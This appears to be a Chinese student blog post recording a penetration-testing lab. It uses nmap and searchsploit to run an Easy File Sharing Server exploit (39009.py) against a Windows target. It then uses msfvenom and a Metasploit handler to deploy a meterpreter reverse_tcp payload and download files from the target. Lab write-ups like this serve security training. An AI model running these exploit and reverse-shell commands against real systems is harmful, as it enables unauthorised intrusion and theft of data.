网络渗透测试复现任务

实验1:漏洞渗透测试

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。
2、利用Nmap扫描发现靶机(Windows)运行了该服务。
3、利用该漏洞,使得靶机运行计算器。

实验1步骤:

步骤1:将物理机上的efssetup_2018.zip文件下载到Windows靶机中

运行过程中可能出现问题

意思是80端口已经被其他的web服务占用了,需要设置一个其他的端口号,我这里设置成了8000端口

步骤2:在kali虚拟机上,使用nmap -O发现同一网络下,靶机的IP地址

步骤3:使用nmap -sV 靶机IP地址,扫描靶机端口开放情况

步骤4:使用指令searchsploit easy file sharing检测easy file sharing server这个服务存在的漏洞,发现许多溢出漏洞

步骤5:以39009.py这一个程序为例,使用searchsploit -m 39009这一指令查询其地址

步骤6:执行指令:python /usr/share/exploitdb/exploits/windows/remote/39009.py 靶机的IP 8000

发现问题

后来查阅才知道,kali直接使用python指令默认的版本是python3,将指令改为python2版本即可

发现靶机自动弹出计算器

实验2:Metasploit应用

1、生成主控端、被控端。
2、获得靶机(Windows)控制权。
3、下载靶机上任意一个文件。

实验2步骤:

步骤1:使用指令:msfvenom -p windows/meterpreter/reverse_tcp lhost=kali的IP lport=kali的端口号 -f exe -o /root/payload.exe

执行后会在kali上生成payload.exe

步骤2:在kali终端输入msfconsole指令打开Metasploit

步骤3:在Metasploit其中分别输入指令use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set lhost kali的IP地址;set lport 刚刚设置的端口号;exploit

步骤4:将第一步在kali生成的payload.exe文件移动至Window靶机中,而后在靶机中执行,之后转到kali虚拟机。会出现以下提示,这时已经获取了对靶机的操控权限。

可以先使用ls查看文件,再用download 文件名下载

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值